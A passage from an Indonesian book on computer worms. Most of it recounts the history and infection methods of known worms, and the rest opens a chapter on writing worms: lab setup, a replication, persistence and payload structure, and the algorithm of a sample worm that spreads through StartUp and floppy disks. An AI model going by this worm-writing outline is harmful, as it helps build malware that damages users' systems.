Computer Worm 1 - Secret of Underground Coding : Uncensored
Bab 2. Mengenal Worm
Virus kemudian mencari sebuah key pada registry yang mengandung kata "kwyjibo", apabila key tersebut tidak ditemukan, virus akan mengeksekusi aplikasi Outlook dan berusaha mengirimkan salinan dirinya kepada 50 penerima yang ada pada address book (buku alamat) aplikasi Outlook. Sebagai tambahan virus menulari file template aplikasi Word "normal.dot" menggunakan fitur VBA macro "Auto Execute", file dokumen yang berasal dari file template tersebut akan membawa serta virus tersebut.
2.5.5 PRETTY PARK Sebuah worm lainnya menyebar luas dimusim panas tahun 1999. Worm yang dinamakan "PrettyPark" ini menyertakan attachment berupa file "Pretty Park.exe". Tidak ada penjelasan pada attachment, hanya saja file tersebut menggunakan icon bergambar seekor beruang, yang merupakan sebuah karakter pada suatu pertunjukan televisi "South Park". Jika dieksekusi, worm menginstal dirinya ke direktori System Windows dan memodifikasi registry yang membuat worm tersebut aktif saat file ber-ekstensi "exe" apa saja dieksekusi. Hal ini menjadi permasalahan bagi program antivirus, yang tentunya juga ber-ekstensi "exe". Worm juga mengirimkan salinan dirinya pada alamat e-mail yang ada pada buku alamat Windows. Pretty Park kemudian berusaha mengirimkan beberapa data system dan password pada sebuah server IRC (internet relay chat) tertentu, terakhir dilaporkan bahwa worm ini memasang suatu backdoor.
2.5.6 EXPLORE ZIP Pada bulan Juni tahun 1999, muncul sebuah worm bernama "ExploreZip" yang menyamar sebagai file zip (file terkompresi) dalam attachment sebuah e-mail yang jika dieksekusi akan menampilkan pesan kesalahan. ExploreZip secara diam-diam menyalin dirinya kedalam direktori System Windows dan memodifikasi registry.
14
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
pada tanggal 9 Januari 2003 ExploreZip kemudian dilaporkan menghasilkan varian baru. Varian ini bernama ExploreZip.N varian dan cukup merepotkan pengguna komputer di Indonesia. Salah satu metode penyebarannya menggunakan e-mail yang memiliki attachment berupa file ZIPPED_FILES.EXE saat file ini dieksekusi maka worm menginstal dirinya sendiri pada system Windows. Worm ini meng-overwrite (menimpa) file dokumen dengan ekstensi DOC (Microsoft Word), XLS (Microsoft Excel), PPT (Microsoft Powerpoint), ASM (Assembler), CPP (C++), C (File C), H (Header C) sehingga file-file tersebut sulit untuk diselamatkan.
2.5.7 BUBBLE BOY Awal tahun 2000, muncul sebuah virus yang membawa sebuah konsep baru "BubbleBoy". Virus ini menunjukkan bahwa sebuah komputer dapat tertular hanya dengan melihat e-mail, tanpa harus membuka pesannya. Virus ini mengambil keuntungan dengan adanya celah keamanan pada aplikasi Internet Explorer, yang secara otomatis mengeksekusi script Visual Basic yang terdapat pada body e-mail. Virus akan datang sebagai sebuah e-mail dengan subjek "BubbleBoy is back", pesan berbentuk file HTML dan mengandung script virus dalam bahasa Visual Basic. Jika menggunakan aplikasi Outlook, script tersebut akan dijalankan walaupun yang dilakukan hanya preview. File tersebut akan ditambahkan pada direktori StartUp Windows, sehingga apabila komputer dihidupkan virus akan berusaha mengirimkan dirinya pada setiap alamat yang ada pada address book aplikasi Outlook. Diwaktu yang hampir bersamaan, worm "KAK" tersebar dengan cara yang serupa.
15
Jasakom
Bab 2. Mengenal Worm
Seperti worm lainnya, ExploreZip juga melakukan penyebaran lewat e-mail dengan memanfaatkan aplikasi Outlook atau Exchange, dengan mengawasi e-mail yang masuk dan membalas e-mail tersebut dengan salinan dirinya.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.5.8 LOVE LETTER
Bab 2. Mengenal Worm
Dibulan Mei 2000, lajunya penyebaran worm "LoveLetter" menunjukkan efektifitas serangan dengan metode social engineering, yang hingga saat ini sudah menjadi suatu kebiasaan suatu worm dalam penyebarannya. E-mail yang berisi worm ini memiliki subjek "I Love You" yang berarti "Saya Cinta Kamu" dan berisi pesan-pesan yang mendorong user untuk mengeksekusi attachment yang merupakan worm tersebut. File attachment berupa Visual Basic Script yang bisa dieksekusi dengan Windows Script Host (bagian dari Windows98, Windows2000, Internet Explorer 5, atau Outlook 5). Ketika dieksekusi, LoveLetter menginstal dirinya kedalam direktori System Windows dan memodifikasi registry untuk memastikan bahwa worm akan aktif saat komputer dihidupkan. Ketika komputer lainnya terinfeksi, dan jika aplikasi Outlook terinstal pada komputer tersebut, maka worm akan mengirimkan salinannya pada siapa saja yang ada pada address book aplikasi Outlook. Sebagai tambahan worm akan membuat koneksi IRC dan mengirimkan salinan dirinya pada siapa saja yang bergabung pada saluran IRC tersebut. LoveLetter juga memiliki kemampuan untuk mencuri password. Dengan mengubah home page (alamat url yang akan diakses pertama kalinya) pada Internet Explorer ke suatu website di Asia, worm akan mengusahakan agar suatu trojan horse di download dari website tersebut, dimana trojan horse tersebut akan mengumpulkan password e-mail dan mengirimkannya ke suatu alamat di Asia.
2.5.9 HYBRIS Dibulan Oktober 2000, worm Hybris menyebar dengan e-mail berattachment. Jika dieksekusi akan memodifikasi file WSOCK32.DLL dalam rangka menjejaki semua lalu lintas ber-internet. Untuk setiap e-mail yang terkirim worm akan mengirimkan salinan dirinya ke alamat penerima yang sama. Yang menarik dari worm ini yaitu; bisa men-download file update untuk dirinya sendiri dari newsgroup "alt. comp.virus" metode yang digunakan termasuk canggih dan sangat berbahaya karena payload worm tersebut bisa diubah kapan saja.
16
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Pada bulan Februari 2001, kembali sebuah worm mencemaskan para pengguna internet, yang memanfaatkan kepopuleran seorang petenis asal Rusia "Anna Kournikova". Worm ini dibawa dalam suatu attachment e-mail yang menyatakan bahwa lampiran tersebut adalah file gambar dalam bentuk file jpg yang memuat foto pemain tenis tersebut. Apabila file tersebut dieksekusi maka akan mengirimkan salinan dirinya kepada setiap nama yang terdaftar pada buku alamat Microsoft Outlook.
2.5.11 SADMIND Pada bulan Mei 2001, worm Sadmind menyebar dengan mentargetkan 2 vulnerability (kelemahan) pada 2 sistem operasi yang berbeda, dan menjadi teladan untuk worm berikutnya yang bisa melakukan serangan dengan berbagai kombinasi. Pertama kali yang dilakukannya adalah meng-eksploitasi vulnerability buffer overflow pada sistem operasi Sun Solaris, dan menginstal suatu program agar bisa melakukan komunikasi dengan IIS webserver guna melakukan suatu serangan. Vulnerability ini kemudian diumumkan pada tanggal 18 Juni 2001, yang menunjuk sebagai vulnerability pada Index Server ISAPI.
2.5.12 CODE RED Memanfaatkan vulnerability pada Index Server ISAPI tersebut, pada tanggal 12 Juli 2001 muncul sebuah worm dengan nama "Code Red" yang menyerang semua IIS webserver, dengan aksi mengubah tampilan awal website pada server yang tertular. Pertama kali worm menginstal dirinya pada system, membaca IP system dan dari IP tersebut worm menyusun 99 IP baru, kemudian melakukan pemeriksaan sistem operasi pada IP yang berhasil disusunJika worm menemukan sebuah IP target menggunakan sistem operasi
17
Jasakom
Bab 2. Mengenal Worm
2.5.10 ANNA KOURNIKOVA
Computer Worm 1 - Secret of Underground Coding : Uncensored
Microsoft Windows maka worm akan meng-eksploitasi server target tersebut, dan melakukan deface (mengubah halaman awal suatu website) dengan tampilan "Welcome to the www.worm.com ! hacked by Chinese!." Bab 2. Mengenal Worm
Berikutnya worm mencari file c:\notworm. Worm tidak akan menghentikan serangannya jika file tersebut tidak ditemukan. Pada tanggal 20 Juli worm akan melakukan serangan DOS (denial of service) pada server www.whitehouse.gov, kemudian pada tanggal 27 worm membuat dirinya dalam kondisi dormant (fase saat worm menjadi tidak aktif) secara permanen. Tidak begitu lama pada tanggal 19 Juli 2001, muncul Code Red I yang merupakan versi kedua dari worm Code Red dengan penyebaran yang lebih cepat. Banyak perbaikan pada program worm sehingga mampu menginfeksi 359.000 unit komputer hanya dalam waktu 14 jam, seperti versi pertama worm ini juga membuat dirinya dalam kondisi dormant pada tanggal 20 Juli secara permanen. Di bulan Agustus 2001, kembali Code Red muncul dengan versi berbeda "Code Red II", muncul dengan payload yang sangat berbahaya. Worm ini masih memanfaatkan vulnerability yang sama dengan versi sebelumnya, sedikit perubahan pada program, worm ini akan membuat suatu trojan "explorer.exe" dan ditempatkan pada direktori root.
2.5.13 NIMDA Tanggal 18 September 2001, worm Nimda adalah worm yang termasuk paling banyak menginfeksi komputer di Indonesia, muncul dengan memuat payload yang sangat berbahaya dan menggunakan beragam cara dalam penyebarannya, pada 12 jam pertama saja worm ini sudah berhasil menginfeksi 450.000 unit komputer, dan dalam dua hari Nimda berhasil menginfeksi 2,2 juta komputer serta menyebabkan kerugian sebesar US $ 370 juta. Walaupun worm ini tidak menggunakan metode baru dalam penyebarannya, tetapi dengan penggabungan beberapa metode dalam suatu worm, menunjukkan adanya tingkatan baru atas kompleksitas yang tidak terlihat sebelumnya. Nimda melakukan penyebaran dengan mengirimkan salinan dirinya melalui e-mail dengan subjek random (acak) dan sebuah file attachment "readme.exe".
18
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Bila komputer terinfeksi berada dalam suatu jaringan maka secara otomatis Nimda mencari direktori yang di sharing dari komputer lain dan memberikan hak tulis penuh (full access) kemudian membuat salinan dirinya ke dalam direktori-direktori tersebut, dengan mengambil nama file secara random pada daftar file yang ada pada komputer terinfeksi, dengan menggunakan ekstensi EML atau NWS. Pada server yang terinfeksi, file-file halaman web akan disisipkan script baru yang secara otomatis mengakses file readme.eml saat halaman web tersebut dibuka. Dalam penyebarannya, Nimda juga memanfaatkan backdoor pada server yang terinfeksi CodeRed2 atau Sadmind. Banyaknya perubahan pada file system dan registry membuat worm ini sulit untuk dibersihkan.
2.5.14 BADTRANS.B Pada bulan November 2001, BadTrans kembali beraksi setelah kemunculan perdananya pada tanggal 12 April 2001 dengan teknik yang lebih canggih dan bisa dikatakan sebagai era baru dalam social engineering. BadTrans.B memeriksa direktori inbox pada aplikasi Outlook dengan mencari e-mail yang belum dibuka oleh user, kemudian membalas e-mail tersebut dengan file attachment berupa salinan dirinya sendiri. Seperti Nimda, e-mail yang dikirimkan berupa halaman html dan secara otomatis mengaktifkan file attachment walaupun e-mail tersebut hanya dilihat pada preview pane saja. Pada proses pengiriman e-mail BadTrans.B menambahkan underscore (tanda garis bawah) "_" disetiap awal alamat pengirim, sehingga apabila e-mail tersebut di-reply (balas) maka e-mail balasan tersebut tidak akan sampai pada alamatnya. BadTrans.B akan menginstal suatu program trojan yang akan mencuri user name dan password kemudian mengirimkannya pada suatu alamat e-mail tertentu, dilaporkan worm ini mengakibatkan kerugian sebesar US $ 210 juta.
19
Jasakom
Bab 2. Mengenal Worm
Nimda memanfaatkan celah keamanan pada Internet Explorer dan Outlook Express 5.01 dan 5.5 Service Pack 1, dimana e-mail yang dikirimkan Nimda berupa halaman html yang memiliki body script tertentu dengan tujuan akan secara otomatis mengaktifkan file attachment walaupun e-mail tersebut hanya dilihat pada preview pane saja.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.5.15 KLEZ Worm Klez muncul di bulan Oktober 2001, seperti worm lainnya worm ini pun menggunakan kelemahan IE dan OE sehingga worm tereksekusi dengan sendirinya walau hanya dilihat pada preview pane saja. Bab 2. Mengenal Worm
Klez hanya menggunakan sarana e-mail dalam penyebarannya. Klez menyatukan suatu keunikan dengan pendekatan sosial yang inovatif, dengan memilih salah satu alamat e-mail yang ada pada komputer terinfeksi dan menggunakan alamat tersebut sebagai alamat pengirim, kemudian mengirimkan salinan dirinya ke seluruh alamat e-mail yang lain. Dengan cara ini terlihat, seolah-olah e-mail dikirim oleh seseorang yang benar-benar dikenal oleh penerima. Tanggal 11 Nopember 2001, dilaporkan kembali varian lain dari worm tersebut. Klez.d memiliki rutin baru yang akan memeriksa database alamat e-mail dari pengguna ICQ sebagai target pengiriman. Saat dieksekusi worm menginstal dirinya kedalam direktori System Windows dengan nama file "WinSvc.exe" dan melakukan modifikasi pada registry sehingga worm akan aktif saat komputer dihidupkan. Varian lainnya muncul dengan nama Klez.e dan dilaporkan pada tanggal 17 Januari 2002. Saat dieksekusi worm akan menginstal dirinya kedalam direktori System Windows dengan nama file "WINK???.EXE", dimana ??? adalah variabel random berupa angka 2 dan 3. Seperti Klez. d worm ini juga memodifikasi registry dengan alasan yang sama, Selain itu worm ini juga telah dipersenjatai dengan pembunuh program antivirus yang bisa mendeteksi Nimda, Code Red, Sircam dan Fun Love. Pada varian selanjutnya, e-mail tidak hanya terlihat berasal dari seorang teman tetapi klez menyisipkan sebuah tool "imunitas" sebagai attachment dan penerima diajarkan untuk menon-aktifkan antivirus mereka agar bisa menjalankan tool tersebut, dengan mengikuti petunjuk tersebut, dan saat attachment tersebut dieksekusi maka sebenarnya user malah menginstal Klez serta virus ElKern pada komputer mereka. Klez merupakan salah satu worm yang memiliki siklus hidup terpanjang, yang pernah mengacaukan dunia internet. Pertama kali dilaporkan pada bulan Oktober 2001, dan mendominasi pada tahun 2002 sebagai worm yang paling lazim di internet.
20
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
2.5.16 SLAMMER Serangan worm Slammer dimulai pada tanggal 23 Januari 2003, worm yang hanya berukuran 369 byte ini menjadikan Slammer sebagai worm dengan ukuran terkecil yang pernah ada. Cara kerja worm ini hampir sama dengan CodeRed, dan tidak memodifikasi registry. Slammer memanfaatkan vulnerability yang ditemukan oleh Next Generation Security Software Limited pada bulan Juli 2002 dimana dengan memanfaatkan vulnerability ini, penyerang dapat menguasai SQL Server dan kode pemrograman yang berhasil dimasukkan akan berjalan sebagai system karena hak dari MS SQL Server di dalam komputer adalah system. Worm ini bukan merupakan mass mailer dan hanya menyebarkan dirinya melalui scanning port 1434.
2.5.17 BAGLE Di minggu ketiga Januari 2004, sebuah worm yang disinyalir berasal dari Jerman ternyata sukses meraih peringkat pertama sebagai worm yang paling banyak dihentikan. Worm yang kemudian diketahui bernama Bagle ini memiliki siklus hidup yang tergolong singkat, Bagle memasuki fase dormant secara permanen pada tanggal 28 Januari 2004 dan berusaha untuk menghapus file launcher-nya. Bagle memiliki ukuran file sebesar 15 Kb, dan melakukan penyebaran dengan cara mengirimkan file infector melalui e-mail ber-attachment, dengan tujuan pengiriman yang dikoleksi dari file-file berekstensi txt, htm, html dan wab pada sistem lokal. Saat file infector dieksekusi, Bagle membuat salinan file worm pada direktori System Windows, kemudian memanipulasi registry agar worm tereksekusi setiap kali Windows startup.
21
Jasakom
Bab 2. Mengenal Worm
Akhir tahun 2003 kembali dilaporkan varian Klez.H sebagai ancaman, walaupun sukar menentukan besar kerugian yang ditimbulkan, tetapi diperkirakan Klez dan varian-nya menimbulkan kerugian sebesar US $ 9 milyar.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.5.18 NETSKY
Bab 2. Mengenal Worm
Tidak begitu lama setelah kemunculan worm Bagle, sebuah worm lainnya menyebar dengan kecepatan yang lebih tinggi. Worm Netsky melakukan penyebaran dengan cara yang sama seperti yang dilakukan worm Bagle, hanya saja Netsky memiliki beberapa rutin yang memungkinkan dirinya dapat melakukan penyebaran dengan menggunakan media aplikasi peer to peer. Netsky mengirimkan salinan dirinya melalui sebuah e-mail ber-attachment dan dalam bentuk file terkompresi. File worm berukuran sebesar 22 Kb dan menggunakan icon yang disamarkan sehingga terlihat sebagai sebuah file dokumen Microsoft Word. Saat file infector dieksekusi Netsky membuat salinan file worm pada direktori Windows dengan nama file 'services.exe’, kemudian memanipulasi beberapa nilai registry yang bertujuan agar worm dapat tereksekusi setiap kali Windows startup.
2.6 PERKEMBANGAN WORM LOKAL Berikut ini beberapa catatan singkat tentang worm lokal yang pernah ada dan dibuat oleh worm writer asal Indonesia.
2.6.1 I-WORM PERKASA Pada bulan 6 Desember 2001 muncul sebuah worm lokal. Worm yang terkompresi dengan UPX ini memiliki ukuran sebesar 12,288 Kb dan dibuat dengan menggunakan program Visual Basic. Worm yang juga disebut dengan nama I-Worm.Imelda atau I-Worm Updater ini menggunakan media Microsoft Outlook dalam penyebarannya, saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'UPDATE.EXE’, kemudian menambahkan suatu nilai registry pada sub key 'Run’ agar worm ini tetap aktif saat Windows startup.
22
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Worm lokal lainnya muncul dipertengahan bulan September 2003 dengan menggunakan icon Microsoft Word. Worm yang terkompresi dengan ASPack ini juga sering dipanggil dengan sebutan Kenangan, Puisi Cinta, Hallo, Mistery atau MyHeart. Hal ini disebabkan karena worm Pesin menggunakan nama-nama tersebut sebagai nama dari file infector. Worm Pesin menggunakan media disket dalam proses penyebaran, hal ini sangat efektif mengingat penggunaan disket masih sangat diminati oleh pengguna komputer di Indonesia. Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'SysTask.exe’, Pesin juga membuat salinan pada direktori My Documents dengan nama file 'MyHeart.exe’ kemudian menambahkan suatu nilai registry pada sub key 'Run’ agar worm ini tetap aktif saat Windows startup, yang menarik dari worm ini adalah worm akan menonaktifkan program Registry Editor jika user berusaha untuk menjalankannya.
2.6.3 TABARU Pada awal januari 2005 kembali diketahui sebuah worm lokal yang membawa-bawa nama pembawa acara Jejak Petualang di TV7 yaitu Riyanni Djangkaru. Worm ini memiliki ukuran file sebesar 40 Kb dengan icon yang disamarkan sehingga terlihat seperti file jpg. Saat file infector dieksekusi worm membuat dua file, yaitu file 'xpshare.exe’ pada direktori 'C:\!submit’ dan file 'riyani_jangkaru.exe’ pada root direktori ’C:\’, kemudian menambahkan value 'winloader’ pada registry run yang akan mengaktifkan worm setiap Windows startup. Hanya saja worm ini baru banyak dikenal pada pertengahan Juli 2005.
23
Jasakom
Bab 2. Mengenal Worm
2.6.2 PESIN
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.6.4 KANGEN
Bab 2. Mengenal Worm
Pada pertengahan April 2005, suatu worm lokal kembali meresahkan pengguna komputer, dengan berbekal refrain lagu Kangen (Dewa 19) worm ini sukses menginfeksi ratusan komputer di Indonesia. Seperti worm lokal terdahulu, Kangen juga dibuat dengan Visual Basic, menggunakan icon Microsoft Word dan melakukan penyebaran lewat disket, anehnya worm satu ini sama sekali tidak dikompresi J. Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori System Windows dengan nama 'CCAPPS.EXE’ dengan ukuran file sebesar 64 Kb, yang menarik dari worm ini adalah worm akan berusaha menonaktifkan program Task Manager, MS Config dan Registry Editor. Saat buku ini ditulis worm Kangen sudah mencapai varian M.
2.6.5 KUMIS Diawal bulan Juli 2005, seorang worm writer yang konon terinspirasi oleh seorang dosennya yang berkumis tebal membuat worm yang kemudian disebut dengan worm Kumis. Worm ini berukuran sebesar 76 Kb dan dikhususkan untuk sistem operasi Windows XP dan Windows Server 2003. Saat file infector dieksekusi worm ini membuat salinan dirinya ke direktori System Windows dengan nama 'username logon.exe’ dimana username adalah nama user aktif, kemudian memanipulasi registry agar worm tetap aktif. Menariknya, worm kumis ini akan me-restart komputer setiap kali Windows startup.
24
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
2.6.6 DECOIL
Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'lExplorer.exe’, pada direktori System Windows dan sub direktori '\i75-d2’ dengan nama file 'dkernel.exe’. Decoy tergolong worm dengan ukuran yang sangat besar yaitu sebesar 154 Kb (besar file ini setelah dikompres dengan UPX).
2.6.7 RONTOKBRO Diawal bulan Oktober 2005, pengguna komputer di Indonesia kembali dikejutkan oleh sebuah worm lokal yang sudah menggunakan smtp sendiri dalam mengirimkan file infector-nya dan selektif dalam pemilihan alamat e-mail target. Worm yang diisukan sebagai worm lokal ter-anyar yang pernah ada ini ternyata dibuat dalam bahasa Visual Basic , RontokBro juga memblokir aplikasi Registry Editor dan memonitor caption pada aplikasi browser, jika suatu string tertentu ditemukan oleh RontokBro maka komputer akan di-restart secara otomatis.
2.6.8 NOBRON Tidak begitu lama setelah kemunculan RontokBro, worm yang kemudian dikenali dengan nama W32/Nobron.A@mm oleh Norman Virus Control ini berusaha untuk membersihkan system dari worm RontokBro, Nobron memiliki ukuran file sebesar 84 Kb. Worm juga berusaha untuk menonaktifkan aplikasi Registry Editor, MS Config, Task Manager dan CMD. Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori System Windows dengan nama 'MsPatch.exe’, selain itu Nobron juga membuat salinan ke setiap root dari masing-masing drive termasuk USB Flash Disk dengan nama file 'foto administrator.exe’.
25
Jasakom
Bab 2. Mengenal Worm
Worm Decoil yang juga sering disebut Decoy ini muncul di penghujung tahun 2005, worm lokal ini menyembunyikan file dokumen Microsoft Word dan membuat salinan dengan nama yang persis dengan nama file yang disembunyikan.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.6.9 RUNITIS
Bab 2. Mengenal Worm
Pada akhir bulan Nopember 2005, kembali diketahui sebuah worm lokal dengan ukuran file sebesar 164 Kb dan telah dikompres dengan aplikasi ASPack. Worm ini menggunakan nama yang diambil dari nama seorang penyanyi dari Malaysia yaitu Siti Nurhaliza (Runitis jika dibaca terbalik menjadi Sitinur). Runitis menggunakan icon Internet Explorer dalam penyebarannya. Worm ini menghapus file program regedit.exe (Registry Editor), msconfig.exe (MS Config), wmplayer.exe (Windows Media Player), winamp.exe dan winampa. exe (Winamp) serta beberapa file program lainnya kemudian membuat salinan dirinya dengan nama dan letak yang sama, sehingga user malah akan menjalankan worm apabila mengeksekusi aplikasi-aplikasi tersebut.
2.6.10 BLUEFANTASY Di akhir bulan Januari 2006, sebuah worm lokal bernama BlueFantasy ikut berlomba dengan worm lainnya, walaupun worm yang berukuran 68 Kb ini tidak melewati proses enkripsi dan kompresi namun BlueFantasy mempertahankan ciri khas worm komputer yang membuat banyak salinan, dengan cara memonitor direktori aktif dan membuat salinan pada direktori tersebut. Saat file infector dieksekusi BlueFantasy meng-copy dirinya ke direktori System Windows dengan nama file 'Win32.com’ dan menggunakan atribut Hidden, selain itu worm juga membuat salinan pada direktori Desktop, My Documents, dan StartUp. Kemudian worm memanipulasi suatu nilai registry yang akan membuat file worm tetap tereksekusi saat Windows startup, dan membuat type file executable seperti exe dan scr akan terlihat sebagai aplikasi Microsoft Word.
26
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
2.6.11 ROMDIL
Worm Romdil memiliki ukuran file sebesar 40 Kb untuk varian A dan sebesar 41 Kb untuk varian B, worm ini telah dikompres dengan menggunakan aplikasi UPX, Selain itu worm ini menggunakan icon dengan gambar Folder, dan disamarkan sebagai file aplikasi Windows Explorer. Untuk bertahan pada suatu system, Romdil berusaha untuk mencegah user mengeksekusi aplikasi CMD (command prompt), MS Config, Registry Editor, Task Manager, dan beberapa fasilitas Windows seperti Search dan Run.
2.6.12 MYBRO Di bulan Maret 2006, sebuah varian lain dari worm RontokBro kembali di-release dan diperkirakan dibuat dengan menggunakan bahasa C. MyBro memiliki ukuran file sebesar 51 Kb dan menggunakan icon dengan gambar Folder. Worm MyBro diperkirakan menggunakan / meniru source code worm yang sudah ada sehingga pola worm tersebut dapat terdeteksi dengan mudah oleh teknologi SandBox dari Norman Virus Control. Untuk bertahan pada suatu system, MyBro berusaha untuk mematikan service antivirus dari Norman, TrendMicro, Norton, McAfee, AVG, Bit Defender, Panda dan PC Cilin. Selain itu MyBro berusaha untuk menghapus file Microsoft Visual Basic Virtual Machine yang akan menggagalkan proses untuk setiap aplikasi yang dibuat dengan menggunakan bahasa Visual Basic, serta melakukan blocking ke beberapa situs tertentu.
27
Jasakom
Bab 2. Mengenal Worm
Pertengahan bulan Februari 2006, sebuah worm lokal lainnya muncul dan dideteksi Norman Virus Control sebagai w32/Romdil, seperti kebanyakan worm lokal, worm inipun dibuat dengan menggunakan bahasa Visual Basic.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.6.13 IRCBOT.AQF
Bab 2. Mengenal Worm
Dibuat pada awal tahun 2006 dan mulai dikenal pada bulan April 2006, worm IRCBot menyebar dengan memuat sebuah pesan yang ditujukan pada Presiden. Worm yang berasal dari Borneo alias Kalimantan ini tidak berusaha untuk mematikan proses Task Manager ataupun Registry Editor sebagai metode life defender, namun sebagai gantinya IRCBot menggunakan metode Watcher yang terbilang masih baru pada awal tahun 2006, yang akan me-restart komputer jika proses salah satu file launcher dimatikan. File worm berukuran 32 Kb dan menggunakan icon file dokumen Microsoft Word.
2.6.14 LIGHTMOON Worm dengan nama sebutan yang bisa memiliki arti sebagai bulan purnama ini, menyebar dipenghujung April 2006 dengan barisan puisi yang terinspirasi dari bulan purnama. LightMoon menggunakan icon folder dan memiliki ukuran file sebesar 39 Kb, umumnya memiliki beberapa kesamaan teknik dengan worm lokal lainnya, hanya saja LightMoon ini akan mengalihkan akses dari fungsi MS Config, Registry Editor, Task Manager dan Command Prompt pada file launcher worm, sehingga user malah mengeksekusi worm tersebut apabila menjalankan salah satu fungsi tersebut.
28
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Kenapa bab ini ada? Bab ini adalah salah satu bab inti dari buku ini, yang memuat tentang cara-cara pembuatan worm. Perlu untuk penulis ingatkan kembali, bahwa membicarakan masalah pembuatan suatu worm membutuhkan pemahaman tentang tanggung jawab moral yang besar, karena worm dapat menimbulkan kerugian yang sangat besar baik berupa materiil maupun non materiil. Namun demikian, penulis tetap memberikan trik-trik real yang digunakan para worm writer dalam membuat suatu worm, karena akan mengingatkan pembaca semua, bahwa worm adalah program yang sangat berbahaya dan dapat dibuat dengan mudah.
103
Jasakom
Bab 7. Worm WSar.1
BAB 7 WORM WSar.1
Computer Worm 1 - Secret of Underground Coding : Uncensored
B
anyak jalan menuju Roma, mungkin ungkapan ini tidak berlaku pada proses hacking saja tetapi juga sangat cocok apabila ungkapan ini digunakan dalam proses pembuatan suatu worm.
Sudah menjadi suatu rahasia umum dimana para worm writer selalu mencari vulnerability baru karena vulnerability lama kebanyakan sudah memiliki patch untuk memperbaiki celah tersebut, baik dari vendor antivirus maupun dari vendor aplikasi atau sistem operasi itu sendiri. Teknik yang dibuatpun menjadi beragam, penulis sendiri menemukan beberapa trik yang akan dipaparkan pada bab ini. Sebagai persiapan awal untuk membuat suatu worm, virus atau malcode lain, ada beberapa ketentuan yang harus diperhatikan:
Bab 7. Worm WSar.1
1. Jika memungkinkan, sangat disarankan untuk menggunakan komputer tersendiri yang khusus digunakan untuk keperluan ini, dan tidak digunakan oleh banyak orang 2. Gunakan program pembantu seperti ShadowUser atau DeepFreeze,. Program ini akan membatalkan setiap perubahan yang dilakukan bahkan perubahan yang terjadi pada boot sector, sehingga walaupun partisi pada harddisk tak sengaja terformat oleh worm, hanya dengan me-restart komputer maka segalanya akan kembali seperti semula. Program ini hanya mengembalikan perubahan pada saat komputer di restart, jadi jika ternyata perlu me-restart komputer untuk melihat efek perubahan dari suatu worm, maka cukup dengan melakukan Log Off dan kemudian Log In kembali, karena proses ini akan menimbulkan efek yang sama dengan restart komputer. Untuk program DeepFreeze disarankan agar membuat partisi lebih dari satu, misalnya dengan membuat dua partisi dimana partisi C: sebagai drive System Windows dan partisi D: sebagai drive data, kemudian instalkan DeepFreeze hanya pada drive C: saja sehingga data source code yang tersimpan pada drive D: tidak terganggu oleh DeepFreeze. Sementara untuk program ShadowUser lebih flexibel. Anda tinggal menentukan folder apa saja yang ingin dibebaskan dari proteksi
104
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
3. Gunakan program pembantu seperti Virtual PC atau VMWare,. Program ini akan mensimulasikan suatu komputer maya sekaligus dengan jaringannya. Kita dapat membuat suatu lab komputer dengan sistem operasi yang berbeda sekaligus. Keuntungan lain ternyata kita bisa membuat clonning dari suatu komputer virtual, sehingga apabila system suatu komputer virtual sudah tidak bisa diselamatkan lagi, kita dapat mengganti baru dengan backup clonning yang sudah kita siapkan. Lagi pula kita tidak perlu berpindah-pindah tempat untuk mengoperasikannya.
7.1 WORM DASAR 1 Suatu worm dasar dapat dipandang sebagai satu set instruksi berisi sedikitnya tiga sub-rutin yang terpasang. • Sub-rutin yang pertama berfungsi untuk melakukan penularan dengan cara membuat clonning (salinan) dirinya sendiri pada suatu system komputer, media penyimpanan atau melalui suatu jaringan. • Sub-rutin yang kedua berfungsi sebagai live defender (rutin untuk bertahan hidup), yang akan memastikan suatu worm tetap eksis pada suatu host system • Sub-rutin yang ketiga berfungsi sebagai pengatur payload (muatan maksud tertentu) yang mendikte suatu tindakan untuk dieksekusi. Payload ini pada teorinya bisa berupa apa saja seperti menghapus data, memasang backdoor atau memformat harddisk. Sub-rutin pelengkap lainnya bisa saja sebagai penentu kapan payload tersebut dilakukan.
105
Jasakom
Bab 7. Worm WSar.1
Penulis juga menyarankan agar menggunakan aplikasi Visual Basic 6.0 Enterprise, karena untuk versi lain seperti Visual Basic 6.0 Learning Edition penulis menemukan batasan-batasan dan ada fasilitas yang tidak bisa digunakan.
Computer Worm 1 - Secret of Underground Coding : Uncensored
7..2 ALGORITMA Worm ini bernama WSar.1 (worm dasar 1) yang menggunakan icon dengan gambar sebuah folder dan nama yang unik agar menarik minat user untuk mengeksekusinya, merupakan worm yang sangat sederhana sekali, sehingga hanya dapat menginfeksi sistem operasi Windows 9x dan ME yang terinstal secara default pada drive C. WSar.1 memiliki rutin-rutin yang akan melakukan tindakan sebagai berikut:
Bab 7. Worm WSar.1
1. Melakukan pemeriksaan terhadap eksistensi worm itu sendiri pada system komputer 2. Jika worm tidak mendapatkan eksistensinya maka worm akan melakukan reproduksi dengan menciptakan salinan dirinya pada direktori StartUp pada Startmenu 3. Setiap 1 menit berusaha untuk membuat salinan worm ke disket pada drive A 4. Setiap tanggal 13 bulan Oktober akan menampilkan pesan "WSar.1 Ada Pada Komputer Anda" dan menghentikan segala aktifitas worm pada hari tersebut.
